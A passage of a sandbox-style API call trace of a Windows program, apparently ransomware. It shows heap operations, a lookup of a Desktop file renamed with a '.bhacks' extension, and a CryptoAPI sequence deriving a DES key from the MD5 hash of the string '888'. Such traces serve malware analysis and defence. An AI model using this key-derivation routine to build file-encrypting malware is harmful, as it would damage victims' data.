dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0104.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0104.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0104.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0104.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0104.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0104.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0104.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0104.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0104.710] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0104.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0104.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0104.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0104.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0104.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0104.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0104.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0104.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0104.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0104.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0104.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0104.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0104.711] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Tab3I0y Y3.avi.bhacks", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24f82a07, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x24f82a07, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x251263f5, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x7be0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tab3I0y Y3.avi.bhacks", cAlternateFileName="TAB3I0~1.BHA")) returned 0x9a3b80 [0104.712] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0104.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0104.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0104.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0104.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0104.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0104.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0104.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0104.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0104.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0104.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0104.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0104.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0104.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0104.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0104.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0104.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0104.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0104.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0104.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0104.713] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0104.713] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0104.713] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0104.714] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0104.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0104.714] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0104.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0104.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0104.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0104.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0104.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0104.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0104.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0104.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0104.715] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0104.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0104.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0104.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.715] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0104.715] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0104.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0104.715] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.715] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.716] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0104.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0104.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0104.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f60, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0104.716] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9be918) returned 1 [0104.717] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0104.717] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0104.717] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0104.717] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0104.717] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0104.717] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0104.717] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0104.717] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0104.717] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0104.717] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0104.717] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0104.717] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0104.717] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.717] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.717] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0104.717] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0104.717] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0104.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9d18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0104.718] CryptCreateHash (in: hProv=0x9be918, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0104.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0104.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0104.718] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0104.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0104.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0104.718] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.718] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0104.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9d60, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0104.718] CryptHashData (hHash=0x9a3b80, pbData=0x2a718f8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0104.718] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.718] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.718] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0104.718] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0104.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0104.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9e08, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0104.718] CryptDeriveKey (in: hProv=0x9be918, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4580) returned 1 [0104.719] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.719] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.719] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 